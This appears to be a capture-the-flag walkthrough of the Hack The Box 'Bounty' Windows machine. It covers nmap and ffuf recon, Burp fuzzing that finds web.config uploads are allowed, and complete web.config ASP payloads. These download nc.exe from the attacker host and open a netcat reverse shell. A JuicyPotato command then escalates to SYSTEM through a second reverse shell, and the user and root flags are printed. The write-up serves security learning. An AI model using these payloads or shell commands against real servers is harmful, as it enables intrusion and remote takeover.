This is an easy windows box
Tools used
- burpsuite
- copy
- dir
- ffuf
- juicypotato
- nc
- nmap
- python
- smbserver
- type
- wget
- whoami
- winpeas
Reconnaissance
Nmap
nmap -sC -sV -oA bounty 10.10.10.93 -v
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Here’s what nmap teaches us :
- port 80 (HTTP) - IIS 7.5
There is only a web port so let’s see it :
There is only an image accessible here ! Go brute force files/directories with IIS file extension (asp, aspx) :
ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u http://10.10.10.93/FUZZ -e .txt,.asp,.aspx -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.1.0-git
________________________________________________
:: Method : GET
:: URL : http://10.10.10.93/FUZZ
:: Wordlist : FUZZ: /home/liodeus/directory-list-lowercase-2.3-medium.txt
:: Extensions : .txt .asp .aspx
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200,204,301,302,307,401,403
________________________________________________
transfer.aspx [Status: 200, Size: 941, Words: 89, Lines: 22]
uploadedfiles [Status: 301, Size: 156, Words: 9, Lines: 2]
I have two results who looks very interesting, I might be able to upload things.
I tried to upload files with different extensions :
- php, txt, asp, aspx - not working
- png, jpg - works
We can found the upload file in the directory found by ffuf :
From here, I tried to found a list of possible extension that I could upload, for that I used BurpSuite intruder. Upload a file intercept the request with BurpSuite, send it to the intruder :
The position of the payload is the file extension and as payload I used this wordlist from SecLists : /SecLists/Fuzzing/extensions-skipfish.fuzz.txt
Now launch the attack and wait for results. Here are the payloads who works :
Searching on Google what I could do with this extension, I found those articles :
- https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
- https://soroush.secproject.com/blog/2019/08/uploading-web-config-for-fun-and-profit-2/
I might be able to upload a web.config file and get code execution !
Exploit
Reading the articles, there is a test file when upload and executed who output ‘3’ if there is a code execution :
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
Nice I have code execution, now with some more Googling, I found this repository : https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c, who gives 3 web.config files :
- First : Download nc.exe on to the machine
- Second : Launch nc.exe to get a reverse shell
- Third : A webshell
I used the first two, upload nc.exe on the machine :
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' Set your settings
strFileURL = "http://10.10.14.10:8000/nc.exe"
strHDLocation = "C:\Windows\Temp\nc.exe"
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Response.write("<!-"&"-")
%>
-->
Start a python server so that the web.config can fetch the file needed (nc.exe) :
python -m SimpleHTTPServer
Then go to :
http://10.10.10.93/uploadedfiles/web.config
This execute the payload. On my python webserver, I see a connection who fetch nc.exe, nice ! Now upload the nc.exe launcher (second web.config from the repository) :
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("C:\Windows\Temp\nc.exe -d 10.10.14.10 1234 -e c:\windows\system32\cmd.exe")
Response.write("<!-"&"-")
%>
-->
Start a nc listener :
nc -lvp 1234
Go to :
http://10.10.10.93/uploadedfiles/web.config
See the listener :
nc -lvp 1234
listening on [any] 1234 ...
10.10.10.93: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49164
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
bounty\merlin
Nice, I know have a reverse shell on the machine ! Trying to found the file user.txt :
c:\Users\merlin\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5084-30B0
Directory of c:\Users\merlin\Desktop
05/31/2018 12:17 AM <DIR> .
05/31/2018 12:17 AM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 11,682,705,408 bytes free
It’s not here, or maybe I can’t see it, so I search how to display hidden files and found this command :
c:\Users\merlin\Desktop>dir /ah
dir /ah
Volume in drive C has no label.
Volume Serial Number is 5084-30B0
Directory of c:\Users\merlin\Desktop
05/30/2018 12:22 AM 282 desktop.ini
05/30/2018 11:32 PM 32 user.txt
2 File(s) 314 bytes
0 Dir(s) 11,682,705,408 bytes free
Here is the user.txt file ! Now to root ! I used winPEAS to get informations about the box, start a smb server for easy file transfert :
sudo smbserver.py -smb2support liodeus ./
Then launch winPEAS, I used the .bat version because I couldn’t make works the .exe one :
\\10.10.14.10\liodeus\winPEAS.bat
It gives me a lot of informations but the one I’m interested in is the privileges that I have, winPEAS gives us those privileges, but if you want to do it manually, here’s the command :
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
If he user has SeImpersonate or SeAssignPrimaryToken priviles then you are SYSTEM (https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/juicypotato). Download the exploit :
wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe
Then start the smb server to transfert files :
sudo smbserver.py -smb2support liodeus ./
Copy over the Juicypotato and nc :
copy \\10.10.14.10\liodeus\nc.exe .
copy \\10.10.14.10\liodeus\JuicyPotato.exe .
Start another nc listener :
nc -lvp 12345
Launch JuicyPotato as follow :
c:\Users\merlin\Desktop>JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -a "/c c:\Users\merlin\Desktop\nc.exe -e cmd.exe 10.10.14.10 12345" -t *
JuicyPotato.exe -l 1337 -p c:\Windows\System32\cmd.exe -a "/c c:\Users\merlin\Desktop\nc.exe -e cmd.exe 10.10.14.10 12345" -t *
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
Go to the listener :
nc -lvp 12345
listening on [any] 12345 ...
10.10.10.93: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.93] 49204
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
And I’m nt authority\system, nice ! Go read the flags now.
Miscellaneous
Flags
User.txt
c:\Users\merlin\Desktop>type user.txt
type user.txt
e29ad89891462e0b09741e3082f44a2f
Root.txt
C:\Users\Administrator\Desktop>type root.txt
type root.txt
c837f7b699feef5475a0c079f9d4f5ea